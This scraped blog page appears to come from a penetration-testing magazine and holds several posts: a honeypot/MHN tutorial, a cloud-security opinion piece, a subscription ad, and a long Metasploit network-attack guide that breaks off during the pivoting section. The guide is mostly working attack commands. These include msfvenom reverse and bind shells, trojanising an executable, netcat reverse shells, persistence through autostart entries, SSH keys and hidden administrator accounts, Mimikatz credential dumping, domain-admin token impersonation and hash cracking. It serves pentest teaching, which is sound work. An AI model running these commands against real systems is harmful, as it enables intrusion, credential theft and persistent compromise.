Honeypots in Endpoint Security and How to Deploy a Honeynet

Posted 3 years ago by Bartek Adach

Honeypots in Endpoint Security and How to Deploy a Honeynet

by Gilad David Maayan

The article has been originally published at: https://pentestmag.com/product/pentest-azure-kubernetes-and-cloud-security-tools/

In this article, you’ll learn what a honeynet is and how honeypots can help protect your organization’s endpoints. You’ll also learn how to deploy a honeynet with Modern Honey Network (MHN), an open-source tool.

How are Honeypots Used in Endpoint Security?

Endpoint Detection and Response (EDR) is a system that collects and analyzes information related to security threats from computer workstations and other endpoints to detect and detect security breaches as they occur. Facilitate rapid response to potential threats.

EDR has many improvements, but a full defense-in-depth strategy needs more. Leading provider EDR solutions still have a gap between threat detection in the network, endpoint asset detection and development, and security controls sharing information and minimizing response times. Complementary technologies can fill this gap.

Deploying trickery technology as a complementary technology along with the EDR platform can play an important role in eliminating this risk. Most people admit that deception is an effective means of detecting threats early and accurately and reducing the attacker's dwell time. However, with an advanced decentralized fraud platform (DDP), organizations can also automate visibility, asset discovery, and information sharing.

A honeypot is a network-connected system set up as a bait to lure cyber attackers and detect, bias, and investigate hacker attempts to gain unauthorized access to information systems. The honeypot feature is considered a potential target for attackers on the Internet (usually servers or other high-value assets) to gather information and to allow unauthorized users to access the honeypot. This is an attempt to notify the defender.

Large enterprises and enterprises participating in cybersecurity research are typical users of honeypots used to identify and defend against attacks from Advanced Persistent Threat (APT) attackers. Honeypots are an important tool for cybersecurity researchers who want to implement aggressive defenses against attackers in large organizations or learn more about the tools and techniques used by attackers.

Honeypots appear to be legitimate parts of the network used to retrieve information from trespassers tricking them into accessing the honeypot. Security teams deploy these traps as part of their cyber defense strategy. Honeypots are also used to investigate the behavior of cyber attackers and how they interact with networks.

What Is a Honeynet?

A honeynet is a network architecture that contains one or more honeypots. A honeypot is a computer or virtual machine disguised as a filestore, service, application, or endpoint. It is designed to be appealing to attackers and often includes fake “valuable data”. Honeypots and honeynets lure in and distract attackers from legitimate systems while security is alerted.

Honeynets can be real or virtual. A virtual honeynet is created through virtualization on a single server. When created, these nets include intentional vulnerabilities that allow attackers into a sandboxed environment. Sandboxed environments are isolated from other systems, containing any harm an attacker might do.

Honeynets and the decoys contained inside are a type of deception technology. Security teams can use this technology to identify attacks to their systems and gain insight on attack methods and processes. This can be an important complement to penetration testing efforts.

Honeynets and honeypots have a near 0% false-positive rate since there is no legitimate reason to access these tools. This makes honeynets and honeypots reliable for detecting breaches and monitoring attack behavior. It can also make these tools helpful in detecting attacks that otherwise bypass security measures, such as advanced persistent attacks.

Honeynets are meant to simulate a real network and often include real applications and services. These nets should never include real data but may have simulated data that appears real. Including real data would defeat the purpose of honeynets as tools to prevent a data breach.

Honeynets can include canary data; data that serves no legitimate purpose and is easily identifiable. This type of data can be included to help you track an attacker’s actions after they leave your system. If you find your canary data in “the wild”, you know it has come from an attack on your honeypot.

How to Deploy a Honeynet

To deploy a honeynet, you can either create one from scratch or you can use a prebuilt tool. Building a network from scratch allows greater customization but requires more time and expertise. Using a pre-built tool enables you to deploy a network more quickly and with minimal hassle. One caveat of using pre-built tools is that you need to verify that the tool is secure before using it.

The following tutorial outlines how to deploy a honeynet using the pre-built, Modern Honey Network tool. MHN is an open-source server application you can use to manage and collect data from honeypots. It is written in Flask and can be used with Ubuntu 18.04 and 16.04, and Centos 6.9.

1) Install MHN

You first need to install MHN on your designated server. You can use real or virtualized (simulated) hardware. This server should already have security measures in place, just as you would have for a real server. Make sure to test that your machine is running properly and has enough resources for any tools you include.

In general, this machine should reside in the Demilitarized Zone (DMZ) of your network. The DMZ is the area between your firewalls and any endpoints with Internet access.

Install MHN using the following command:

$ cd /opt/

$ sudo git clone https://github.com/pwnlandia/mhn.git

$ cd mhn/

$ sudo ./install.sh

2) Configure MHN

To configure MHN, you need to provide a few system-specific details. You are prompted for these details during installation. Be prepared to provide superuser credentials, URLs for your server and Honeymap, and a path for your log file. Once complete, you can log into your server using the credentials you specified to confirm that configuration and installation were successful.

When you configure your net, you should not publish the IP address ranges of your honeypots. Typically, honeypots can be found with scanners anyway. Keeping IPs private can help make honeypots look more realistic to attackers.

3) Run MHN

You can run MHN directly, behind a web proxy, over HTTPS, or in a container. MHN employs NGINX as its server software. You can view the status of MHN from an included web interface.

If you are simply testing how honeynets work, it is best to run this server from a service outside your own network. A Digital Ocean droplet or AWS instance will work well provided you carefully monitor your costs.

If you are creating a honeynet to aid your system security, consider placing the net behind your firewalls. This prioritizes catching attacks from inside the network, which can do the most damage.

4) Deploy Your Honeypots

MHN includes scripts for deploying a variety of open-source honeypots, including Snort, Cowrie, and glastopf. You can also manually deploy honeypots. The type of honeypot you use depends on your purposes. To customize your honeypots, refer to each tool’s respective documentation.

To deploy honeypots, you need to login to the MHN web app, choose deploy, and select the type of honeypot you want to use. Next copy the provided command, login to your destination server, and run the command with root privileges.

Once the command script finishes running, you can check that the honeypot was successfully deployed. Active honeypots are shown in your deployed sensor list in the web app.

5) Set Up Your Logging

You can integrate MHN with Splunk, ArcSight, or an Elastic Stack for logging. If you use ArcSight or Elastic, you can take advantage of built-in data analysis features in addition to data centralization.

Once you’ve integrated logging, you can begin analyzing the data that your honeynet collects. Depending on where you’ve placed your net, you may see numerous attacks per day. To help optimize your analysis, try to determine a baseline of activity. This is particularly helpful for external honeynets, which are likely to see activity from automated bots or other activity you are uninterested in.

Title: Defence vs Control: Understanding the optimal approach to your cloud security

Posted 3 years ago by Bartek Adach

Defence vs Control: Understanding the optimal approach to your cloud security

by Subhalakshmi Ganapathy

A cloud environment is not a replica of an on-premises network or a data centre. Unlike traditional data centres, which have a rigid IT architecture blueprint, the cloud comes with flexibility that allows users to architect their infrastructure and resources. With the cloud's dynamic space, users can change their infrastructure or decide to go with a different architecture. Further, the way the data transfers and systems communicate differs largely between the cloud and on-premises networks. In the cloud, applications interact with each other using application programming interfaces (APIs). Cloud vendors provide various APIs, such as Platform as a Service APIs, Software as a Service APIs, and Infrastructure as a Service APIs, for users to connect to their service, transfer data, and manage access to their data and systems hosted in the cloud. Such stark differences in how the IT architecture is being designed and communicated differentiates cloud and network security.

How a network security model would not fit your cloud: Intrusions are one of the most common threats to on-premises networks. Adversaries try to exploit open ports, vulnerabilities in internet-facing endpoints, and more to break into the network. Later they move laterally within the network to gain hold of high-profile accounts, or critical resources to carry out attacks. They also employ slow exfiltration tactics and techniques to sneak sensitive data out of the network without being detected. Such risks—network penetration and slow exfiltration of data— are irrelevant to cloud security. With the cloud, all adversaries must do is take control of the APIs to hijack the resources and steer the sensitive data to their command-and-control server.

According to the 2021 IBM Security X-Force Cloud Threat Landscape Report, two-thirds of cloud incidents can be attributed to misconfigured APIs that allow unauthorised access. As businesses rush to the cloud, many will likely fall for misconfiguration-caused-breaches in 2022. Technological research firms, such as Gartner, also expect that through 2023, at least 99% of cloud security failures will be through cloud resource misconfigurations.

What's the fix to this big cloud security threat?

Every cloud vendor has their own resource types, configuration attributes, APIs, and interfaces. If an organisation adopts a multi-cloud environment, the complexity of governing the many APIs and interfaces is huge. Setting up the cloud policies, controls, and configuration attributes isn't a one-time effort. Post-deployment configuration changes, termed as drift, can also lead to huge cloud data leaks if not monitored constantly.

Here are two pointers to avoid cloud security threats:

#1: Get to know your cloud: Most misconfigurations occur due to a lack of visibility. Gain visibility into the different communication points of your cloud by constantly auditing security policies and controls. Looking out for major changes and analysing the legitimacy of a policy change can save you from disastrous misconfigurations.

#2 Get to know your cloud users: Monitor users who try to access your cloud resources and data. With the increased cloud adoption, malicious API traffic has also increased. So, it is important to understand cloud traffic patterns, what kind of services or applications employees use, and what the source of incoming cloud traffic is.

While the visibility, shadow IT, and cloud traffic monitoring concerns can be addressed using a robust cloud access security broker (CASB) solution, detecting and fixing misconfigurations across the infrastructure, platform, and software hosted on cloud can be done using cloud security posture management (CSPM) tools. A security information and event management (SIEM) tool, with its behavioral analytics and extended detection and response (XDR) component, can complement the working of CASB and CSPM solutions in ensuring cloud security.

A unified console

Organisations are adopting different tools to address cloud security concerns, such as keeping shadow IT under check, stopping malicious API traffic, ensuring that the right security policies and controls are employed, and detecting and fixing misconfigurations. When these tools are disjointed and don't communicate with each other, it adds more complexity to ensuring cloud security. A unified console, that seamlessly orchestrates different security events and tools, displays applicable metrics that help resolve these issues and is both efficient and cost-effective.

The cybersecurity market has already learned the importance of security tool convergence. User and entity behaviour analytics, which was a standalone component for quite some time, converged predominantly with SIEM. All other security tools, such as threat intelligence platforms, security orchestration, automation, and response (SOAR), and XDR are getting consolidated within the bigger platform, SIEM. Such consolidations help businesses formulate stronger security strategies and defence systems to keep attackers at bay.

SIEM tools act as a platform where all security data are consolidated and analysed. Contextual security inputs such as threat feeds, malware data points, and vulnerability scanners' inferences are fed to the system for effective analysis. With the artificial intelligence or machine-learning-based behavioural analytical component, security events are better analysed and the red flags are spotted accurately. With an effective SOAR or XDR component that comes with the SIEM tool, incident resolution becomes easier and the security operations centre can always keep track of their key metrics. The cybersecurity market has learned from the past and with the increase in cloud adoptions, tools such as CSPM and CASBs are also taking their place in bigger platforms such as SIEM.

About the Author

Subhalakshmi Ganapathy has an extensive background in the cybersecurity industry and product management. She understands the acute needs of enterprises and helps improve their security posture, resolving the technological challenges in the cybersecurity space. Subhalakshmi contributes to the community by guiding enterprises to adopt best practices in incident detection, threat hunting, attack mitigation, and compliance with regulatory mandates.

Get your mag subscription 22% OFF for Summer ‘22!

Posted 3 years ago by Bartek Adach

Summer ‘22 is just around the corner! We want to celebrate the upcoming sunshine with some special deals for you, so that you can equip yourself for the next 12 months or even 24 months with your chosen magazine subscription plan.

The deal is simple - you can get PenTest Magazines Only or IT Pack Magazines (PenTest, Hakin9, and eForensics, 3 subscriptions in 1) 22% OFF through the end of this week! Simply choose your preferred option and get the convenience of a 1-year-long or a 2-years-long access with a great discount.

>> Get PenTest Magazine Only
>> Get IT Pack Magazines

Interested in other subscription plans? Let me know at: bartek.adach@pentestmag.com and let’s talk! We will surely find a beneficial deal for you :)

Just remember the clock is ticking and this special offer is on only till June 12th.

>> Choose your subscription

Infrastructure Testing with MSF

Posted 3 years ago by Bartek Adach

Infrastructure testing with MSF

Penetration testing of the corporate network using Metasploit

by Karol Mazurek

INTRODUCTION

During a full penetration test of the corporate network, you will need many tools to accomplish different tasks to find and exploit vulnerabilities. You will usually find yourself in a situation where you have to manage many sessions simultaneously. Imagine a scenario where you compromised ten hosts, and you want to switch between them quickly. Additionally, few of these hosts are placed within the internal network, so you will need to pivot through one of the compromised systems (bastion). Although it is possible, it would be hard to accomplish those tasks in a single terminal window. Fortunately, there is a solution — The Metasploit Framework.

WHAT WILL YOU LEARN?

In this article, you will learn how to use Metasploit Framework as a Command and Control Center during the Penetration Testing assessment of the corporate network. Although this guide will focus on the Metasploit Framework you will find different tools and techniques, that can be used to improve the test quality.

0. PREPARE THE ENVIRONMENT

To use the full potential of the Metasploit Framework and save the results of scanning & looting during the penetration tests, you have to initiate the msfdb.

### START UP THE POSTGRESQL SERVER
systemctl start postgresql
# OR 
sudo service postgresql start
### INITIALIZE THE MSF DATABASE
sudo msfdb init
### RUN METASPLOIT (sudo if you want to use restricted port 443)
msfconsole
### CHECK DATABASE CONNECTION ( RESPONSE => [*] Connected to msf.) 
db_status
### SET WORKSPACE
workspace -a <project_name>

From now on, any scan or imports from 3rd party applications will be saved into the initialized database in the <project_name> workspace.
It is a good habit to update your tools before using them:

sudo apt update
sudo apt upgrade metasploit-framework nmap
sudo nmap --script-updatedb
sudo /opt/nessus/sbin/nessuscli update --all

1. RECONNAISSANCE PHASE

The first stage of penetration tests — to make a long story short it is gathering information about target systems to find the foothold and exploit the vulnerable services.

1.1. HOST DISCOVERY

Discover which hosts are active on the network using ICMP sweep with build-in db_nmap which will automatically import scan results to initiated msfdb.

### CONDUCT ICMP SWEEP
db_nmap -sn 10.10.10.0/24

1.2. PORT & VULNERABILITY SCANNING

To discover services running on the active hosts, you have to conduct full range port scanning, and to find some common vulnerabilities perform vulnerability scanning.

### SERVICES & VULNERABILITIES SCANNING WITH db_namp
db_nmap 10.10.10.2 10.10.10.3 -A -Pn -p- --script vuln --append-output -oA <project_name>_scan

1.3. BETTER HOST DISCOVERY & PORT & VULNERABILITY SCANNING

Although during CTFs, it is better to make quick host discovery with the Ping Sweep technique and then conduct port scanning on the active hosts, during real-world Penetration Tests, it is better to go straight to the port scanning even if the hosts do not respond to ICMP packets (ping requests).
Rustscan is a rapid and reliable port scanning tool that can save the output in nmap.xml format, which you can then import to msfdb.

### FULL RANGE PORT & VULNERABILITY SCANNING OVER THE WHOLE SUBNET 
# SET MAXIMUM NUMBER OF PROCESSES FOR USER TO 5000
ulimit -n 5000
# CONDUCT A SCAN WITH RUSTSCAN
rustscan -a 10.10.10.0/24 --scan-order "Random" -- -Pn -A --script vuln --append-output -oA <project_name>_scan
# IN THE METASPLOIT FRAMEWORK CONSOLE - IMPORT THE RESULTS TO MSFDB
db_import <project_name>_scan.xml

If you do not want to install any new software, you can achieve the same with the Metasploit build-in module auxiliary/scanner/portscan/tcp to discover opened ports and then db_nmap to perform vulnerability scanning over the ports that have been found.

### FULL RANGE TCP CONNECT PORT SCANNING OVER THE WHOLE SUBNET
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.110.0/24
set PORTS 0-65535
set CONCURRENCY 50
set THREADS 100
run
### VULNERABILITY SCAN WITH db_nmap
db_nmap 10.10.10.2 10.10.10.3 -A -Pn -p- --script vuln --append-output -oA <project_name>_scan

1.4. WEB APPLICATION VULNERABILITY SCANNING

Although there are several modules to conduct web application reconnaissance and vulnerability discovery, I would go straight to the 3rd party tools to make enumeration and vulnerability scanning more accurate.
Burp Suite Pro with proper extensions and other open-source tools would be a good choice.
You can see a complete list of tools and extensions that I recommend on the CRIMSON project, which aggregates all primary Web Application Penetration Testing tools in one place.
There is a possibility to import some of the results using the db_import command, and below is an example of the Burp Suite Issues import.
Select issues to export, then click
PPM > REPORT SELECTED ISSUES and chose XML format.

Source: Own study — Exporting Issues in Burp Suite Pro

Source: Own study — Importing the file do msfdb and listing all other available formats

As you can see above, there is the possibility to import output from many tools to msfdb.
Additionally, a small tip, if you do not know how to use a command, type help before it.

1.5. ADDITIONAL INFRASTRUCTURE VULNERABILITY SCANNING

Although Nmap Script Engine is doing an excellent job during infrastructure vulnerability scanning, the use of multiple tools will provide a greater level of coverage and assist in confirming discovered vulnerabilities.
That is why you should use another tool besides Nmap Script Engine, and there are many options available at the moment.
If you are looking for top-tier infrastructure scanners whose output can be imported into the msfdb, the best option is the Nessus Pro software, but it is expensive.
Fortunately, there is Nessus® Essentials allows you to scan your environment (up to 16 IP addresses per scanner) with the same high-speed, in-depth assessments and agentless scanning convenience that Nessus subscribers enjoy.

### INSTALLING NESSUS - KALI LINUX (AMD64) (WSL2)
## DOWNLOAD THE LATEST RELEASE OF NESSUS FROM THE LINK
# INSTALL DOWNLOADED PACKAGE
sudo dpkg -i Nessus-10.0.2-debian6_amd64.deb
# RUN NESSUS SERVICE
sudo /opt/nessus/sbin/nessus-service
## OPEN WEB BROWSER AND GO TO https://localhost:8834/
# FOLLOW INSTALLATION STEPS
# 1. CHOSE NESSUS ESSENTIALS
# 2. REGISTER TO GET AN ACTIVATION CODE
# 3. INPUT AN ACTIVATION CODE
# 4. CREATE A USER ACCOUNT

After installation, choose “Policies => New Policy => Advanced Scan” and set it up as shown below:

Source: Own study — Custom Active Scan Policy Cheatsheet

Then follow the seven steps shown below to set up a scan:

After that, click on the launch icon to start scanning the target:

If you are testing an internal target, which does not resolve http://rfi.nessus.org/rfi.txt, serve this file on one of the hosts that have access to the target machine.

### ON THE COMPROMISED HOST WITH INTERNAL ACCESS
# CREATE TXT FILE WHICH CONTAINS "NessusCodeExecTest"
echo NessusCodeExecTest > rfi.txt
# HOST THE rfi.txt FILE 
python3 -m http.server 1234### ON YOUR HOST IN NESSUS SCAN CONFIGURATION
## WEB APPLICATIONS TAB
# FILL "URL for Remote File Inclusion" WITH:
http://<compromised_host_ip>:<port>/rfi.txt

Launch the scan and when it is finished, export the Nessus report and then import this file to msfdb:

Source: Own study — Import Nessus output to Metasploit

1.6. NESSUS VIA METASPLOIT

You can load Nessus in Metasploit Framework to use it within MSF.

### USE NESSUS WITHIN METASPLOIT FRAMEWORK
## LOAD NESSUS
load nessus
# CONNECT TO THE NESSUS SERVER
nessus_connect <username>:<password>@localhost
# LIST ALL AVAILABLE POLICIES
nessus_policy_list
# LAUNCH SCAN
nessus_scan_new <UUID of Policy> <Scan name> <Description> <Targets>
# CHECK SCAN STATUS
nessus_scan_status
# LIST ALL FINISHED SCAN REPORTS
nessus_report_list
# IMPORT RESULTS TO MSFDB
nessus_report_get
# LIST FOUND VULNERABILITIES 
vulns

2. EXPLOITATION PHASE

The second stage of penetration tests — to make a long story short it is about exploiting the vulnerable services to gain Remote Code Execution on the target host.

2.1. SEARCHING & USING THE EXPLOIT MODULE

Let’s say during the previous phase you have found that target 10.10.10.2 is vulnerable to MS17–010 EternalBlue.
You can use the [1]searchcommand to find a proper exploit module, [2]use <module_name> to choose it, [3]show options to check what is needed for successful exploitation [4]set <var_name> <var_value>to set selected module variables and [5]run to start the exploitation module.

Source: Own study — Using Metasploit Framework modules

Some modules could be used against a range of hosts to exploit them one by one automatically.
You can guess it by checking the exploit module options. If you see the RHOSTS in place of RHOST you can probably run the exploit against many hosts or even the whole subnet, for example, set RHOSTS 10.10.10.0/24.

2.2. ALL-PORTS PAYLOADS

Most corporate environments block outbound connections except those from defined ports (for example 21,22,80,443,992).
You can guess which ports are opened to outbound traffic by looking at the open ports on the target.
If you were not lucky and did not guess it, you can automatically use all-ports payloads to find open ports.
The payload will try every available port until it finds an open
one, going through the entire port range (1–65535).

### USING ALL-PORTS PAYLOAD WITH 2.1. EXAMPLE
use windows/smb/ms17_010_psexec
set PAYLOAD windows/meterpreter/reverse_tcp_allports
exploit -j

2.3. PAYLOAD GENERATION WITH MSFVENOM

MsfVenom is a Metasploit standalone payload generator, and you can use it to generate shellcode for the given platform and architecture.
You can guess if the payload is staged or non-staged by a slash:
Non-staged: windows/shell_reverse_tcp
Staged: windows/shell/reverse_tcp

### LIST ALL PAYLOADS FOR x64 LINUX
msfvenom --list payloads --arch x64 --platform linux
### NONSTAGED REVERSE SHELL ELF EXECUTABLE FOR x86 LINUX
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f elf
### STAGED REVERSE METERPRETER SHELL ELF EXECUTABLE FOR x86 LINUX
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.191 LPORT=4444 -f elf -o rs.elf
### GENERATE STAGED SHELLCODE AS PE32 EXECUTABLE FOR x86 WINDOWS
# USING SHIKATA GA NAI ENCODER WITH 5 ITERATIONS
msfvenom LHOST=10.10.10.1 LPORT=4444 --encoder x86/shikata_ga_nai -f exe --iterations 5 -p windows/shell_reverse_tcp

Msfvenom has a feature to embed the payload within an existing executable.
Specify the executable to inject the shellcode with the -x option and -k to allow the payload to run in a separate thread, allowing the injected binary continuation of the execution after successful payload activation.

### PREPARE A TROJAN FROM EXECUTABLE FOR x64 WINDOWS
msvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 -x printer.exe -k -f exe -o trojan_printer.exe

A valuable option to use (especially during buffer overflow exploitation) is the EXITFUNC which specifies if exiting the shell will close the whole process or just created by shellcode thread — thereby allowing the application to continue to run and allowing you to re-exploit it.

### GENERATE WINDOWS x64 METERPRETER SHELLCODE WITH THREAD EXIT
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f exe -o shell.exe EXITFUNC=thread

If you face the bad chars problem when you cannot use some bytes because, for example, they break the sending line (0x0A 0x0D) or are used as a string array finisher (0x00) thus, truncating the rest of a shellcode, you can mitigate this problem by using -b option to exclude those bytes during shellcode generation.

### LINUX x64 NON-STAGED SHELLCODE WITH BAD CHARS EXCLUSION
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f elf -o reverse.elf -b "\x00\x0A\x0D\x20\xFF"

The examples mentioned above were shown only reverse shell generation, but it is possible to generate bind shell to mitigate the problem of input traffic firewall.

### WINDOWS x86 METERPRETER BIND SHELL
msfvenom -p windows/meterpreter/bind_tcp RHOST=10.10.10.2 LPORT=4444 -f exe > bind.exe
### LINUX x86 METERPRETER BIND SHELL
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=10.10.10.2 LPORT=4444 -f elf > bind.elf

2.4. GAINING SHELL & SESSION MANAGEMENT

Before executing the reverse shell payload on the target system, you have to set up a listener on your host (10.10.10.1) and the multi/handler module perfectly fits this purpose.
The multi/hander module is the heart of the Metasploit Framework, which helps effectively manage the spawned sessions, i.e., every reverse shell gained during the Penetration Test.

### SET UP LISTENING HOST AND PORT
use exploit/multi/handler
set LHOST 10.10.10.1
set LPORT 4444
### INSTRUCT THE MODULE TO LISTEN INDEFINITELY FOR THE CONNECTION
set ExitOnSession false
### RUN THE LISTENER AS A BACKGROUND JOB
exploit -j
### IF YOU WANT TO KILL THE BACKGROUND JOB
jobs
jobs -k <id>

Using the snippet mentioned above, you can start the listener in the background to still use other Metasploit Framework functionalities.
Additionally, the socket will not close after establishing a successful connection and will listen for further connections, which is handy if you attack a few targets at once with the same payload.
If you execute the payload on the target system or initiate the connection with nc 10.10.10.1 4444 -e /bin/bashYou will see in Metasploit that session 1 was spawned.

Source: Own study — Using multi/handler module

Now to list all active sessions use sessions -l:

Source: Own study — Listing active sessions

To interact with the sessions, use the sessions -i 1 or just sessions 1 command, but first try to upgrade the session to meterpreter shell because, as you can see above, you gained only sparc/bsd shell type.

Source: Own study — Upgrading active session

To switch between the sessions, if you are in interactive shell mode, you first have to background the session using CTRL+Z and then repeat the command to switch to interactive mode sessions 1.

Source: Own study — Backgrouding session

2.5. PERSISTENCE

Metasploit has modules that will create a Meterpreter service available to you even if the remote system is rebooted.
Although there are some modules in Metasploit Framework for persistence, I suggest you use the SSH method for Linux and RDP method on Windows.

### LINUX
## METASPLOIT METHOD
# SET MULTI/HANDLER TO USE PORT 4443 AND RUN IT AS A BACKGROUND JOB
use multi/handler
set LHOST 10.10.10.1
set LPORT 4443
exploit -j
## CREATE AN AUTOSTART ENTRY TO EXECUTE NC REVERSE SHELL. 
# THE PAYLOAD WILL BE EXECUTED THEN THE USERS LOGS IN.
# ** nc must be in a directory /usr/bin/nc on the target machine **
use exploit/linux/local/autostart_persistence
set LHOST 10.10.10.1
set LPORT 4443
set session 2
run
# REBOOT THE SYSTEM
sessions 2
shell
reboot
## SSH METHOD
# ADD YOUR PUBLIC KEY TO authorized_keys ON TARGET MACHINE
echo "ssh-rsa AAA[...] root@kali" >> /root/.ssh/authorized_keys### WINDOWS
## METASPLOIT METHOD
# SET MULTI/HANDLER TO USE PORT 4443 AND RUN IT AS A BACKGROUND JOB
use multi/handler
set LHOST 10.10.10.1
set LPORT 4443
exploit -j
# RUN PERSISTENCE MODULE AGAINST THE TARGET
use exploit/windows/local/persistence
set LHOST 10.10.10.1
set LPORT 4443
# EXECUTE THE REVERSE SHELL EVERY 60 SECONDS AFTER USE LOGIN
set DELAY 60
set STARTUP SYSTEM
set SESSION 3
# REBOOT THE SYSTEM
session 3
reboot
## RDP METHOD - VIA METERPRETER
# ADD USER AND ENABLE RDP 
run getgui -u username -p password
## RDP METHOD - CMD
# ENABLE RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# ENABLE RDP THROUGH FIREWALL
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
# CREATE A NEW USER 
net user username password /add
# ADD USER TO REMOTE DESKTOP USERS GROUP
net localgroup "remote desktop users" /add "domain\username"
# ADD USER TO ADMINISTRATOR GROUP
net localgroup Administrators domain\username /add### FIND PERSISTENCE MODULE IN METASPLOIT
search persistence windows

2.6. SHELLCODING

Use msf-nasm_shell to quickly generate short assembly code.

### GENERATING THE OPCODES USING NASM SHELL 
# TRUN ON THE NASM SHELL
msf-nasm_shell
# IN THE NASM SHELL - GENERATE RELATIVE FORWARD JUMP OPCODES
jmp short 0x12
## OUTPUT => 00000000  EB10              jmp short 0x12
# IN THE NASM SHELL - GENERATE RELATIVE BACKWARD JUMP OPCODES
jmp short 0x82
## OUTPUT => 00000000  EB80              jmp short 0xffffff82
# RELATIVE JUMPING TIP
00h to 7Fh for a forward JMP and from 80h to FFh for a backward JMP

3. POST EXPLOITATION PHASE

The last stage of penetration tests — to make a long story short it is about privilege escalation, maintaining control over the machine, pillaging the data (stored credentials and other sensitive information), and pivoting to the internal network.

3.1. PRIVILEGE ESCALATION & METERPRETER

Find yourself in a situation where your session only has limited user rights. You will not have permission to perform on the remote system stuff like credentials dumping, manipulating the registry, or installing backdoors.
One way to escalate the privilege to NT AUTHORITY\SYSTEM on a Windows machine or root during Linux, server exploitation is to use the getsystem command in the active session with the meterpreter shell.

### IN ACTIVE SESSION WITH METERPRETER SHELL
load priv
getsystem

Unfortunately, it works only in the “Utopian world,” and usually, you will face a situation when you have to escalate the privileges manually.
You can upgrade your Metasploit Framework with a Carlos Polop script for privilege escalation Winpeas/Linpeas.

### ON YOUR HOST MACHINE
# DOWNLOAD THE MODULE FOR METASPLOIT
sudo wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/metasploit/peass.rb -O /usr/share/metasploit-framework/modules/post/multi/gather/peass.rb
# DOWNLOAD UPTODATE RELEASE TO YOUR HOST MACHINE
https://github.com/carlospolop/PEASS-ng/releases
### RELOAD MODULES IN THE METASPLOIT CONSOLE
reload_all
### USE DOWNLOADED MODULE FOR PRIVILEGE ESCALATION
use post/multi/gather/peass
set PEASS_URL /home/karmaz95/tools/PRIV_ESC/lin.sh
set session 2
run

You can always upload this script using the meterpreter upload command and do not bother installing additional modules in your Metasploit Framework if you want.
At last, there are some privilege escalation modules in Metasploit that you can use for enumeration and exploitation if your target is unpatched:

### IN METASPLOIT CONSOLE
# FIND UNPATCHED SERVICES
use post/multi/recon/local_exploit_suggester
set session 3
run
# OPTIONALLY CHECK INSTALLED APPLICATIONS AND REVIEW THEM MANUALLY
use post/windows/gather/enum_applications
set session 3
run
# EXAMPLE OF EXPLOITATION OF kitrap0d
search local windows kitrap
use exploit/windows/local/ms10_015_kitrap0d
set LHOST 10.10.10.1
set LPORT 4444
set session 3
show targets
set target 0
run

Source: Own study — Using local_exploit_sugester module

3.2. AD PRIVILEGE ESCALATION — TOKEN IMPERSONATION

Stealing a Kerberos token on the compromised system, which is valid for a certain period, and using it in place of authentication to impersonate the user's identity that created that token.
This way, you can quickly escalate your privileges in the Active Directory.

### IN METERPRETER SESSION ON THE COMPROMISED WINDOWS HOST
load incognito
list_tokens -u
# CHOSE A DOMAIN ADMIN WHICH YOU WANT TO IMPERSONATE
impersonate_token domain\\username
# CREATE A NEW USER AND ADD HIM TO DOMAIN ADMINS GROUP
add_user karmaz95 p@S5w0rd! -h 123.123.123.2
add_group_user "Domain Admins" karmaz95 -h 123.123.123.2

3.3. CREDENTIAL DUMPING

You have successfully escalated your privileges on the host 10.10.10.2 now it is time to pillage the system.
Run the below commands to dump credentials:

### IN ACTIVE SESSION WITH METERPRETER SHELL
# DUMP CREDENTIALS WITH METASPLOIT MODULES - WINDOWS
run post/windows/gather/credentials/credential_collector
run post/windows/gather/smart_hashdump
## IF TARGET IS WINDOWS AND THERE IS PROBLEM WITH PRIVILEGES
# LIST ALL PROCESSES & MIGRATE TO lsass.exe
ps
migrate <id of lsass.exe>

Source: Own study — Migrating to process within Meterpreter session

# USING MIMIKATZ IN METERPRETER - WINDOWS
load kiwi
creds_all
kiwi_cmd "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam"
# SAERCHING THROUGH SYSTEM DATA FILES
search -f pass.txt
search -d c:\\documents\ and\ settings\\administrator\\ -f *.txt
# GET HASHES LINUX
run linux/gather/hashdump
# BONUS - USING 3RD PARTY TOOL lazagne (WORKING ON BOTH WIN/LIN)
upload lazagne.exe
shell
.\lazange.exe all

3.4. CRACKING THE HASHES

Metasploit has the build-in John The Ripper module, which you can utilize to crack the dumped hashes.

### CHECK ALL DUMPED CREDENTIALS
creds### CRACKING WINDOWS HASHES
use auxiliary/analyze/crack_windows
set CUSTOM_WORDLIST /home/karmaz95/tools/PRIV_ESC/rockyou.txt
exploit -j### CRACKING LINUX HASHES
use auxiliary/analyze/crack_linux
set SHA512 true
set CUSTOM_WORDLIST /home/karmaz95/tools/PRIV_ESC/rockyou.txt
exploit -j

You can always use John The Ripper locally and update the msfdb manually — this is my preferred way since Metasploit Cracking modules sometimes let me down.

### CHECK THE HASH ALGO
hashid <hash>
### GET THE PATH TO THE STORED HASHES
loot
### CRACKING NTLM HASHES
john --wordlist=rockyou.txt --format=NT hash.txt
### CRACKING LINUX HASHES (IF HASHED WITH sha512crypt)
john --wordlist=rockyou.txt --format=sha512crypt hash.txt
### CRACKING MD5
john --wordlist=rockyou.txt --format=Raw-MD5 hash.txt
### ADDIND CREDENTIALS TO MSFDB
creds add user:james password:Toyota
### ADDING SSH KEYS TO MSFDB
creds add user:sshadmin ssh-key:/path/to/id_rsa
### ADDING NTLM HASHES TO MSFDB
creds add user:admin ntlm:E2FC15074BF7751DD408E6B105741864:A1074A69B1BDE45403AB680504BBDD1A

3.5. PIVOTING

If you have discovered new targets in the internal network, the natural next step is to make from the compromised target a jump host.
You can quickly achieve it in Metasploit with route command or module post/multi/manage/autoroute command.
Let's say that the internal network subnet is 123.123.123.0/24 and the compromised host spawned a shell in session 2. Then you can pivot using three different ways shown below:

### IN METASPLOIT CONSOLE
# ADD TUNNEL TO THE ROUTING TABLE USING ROUTE
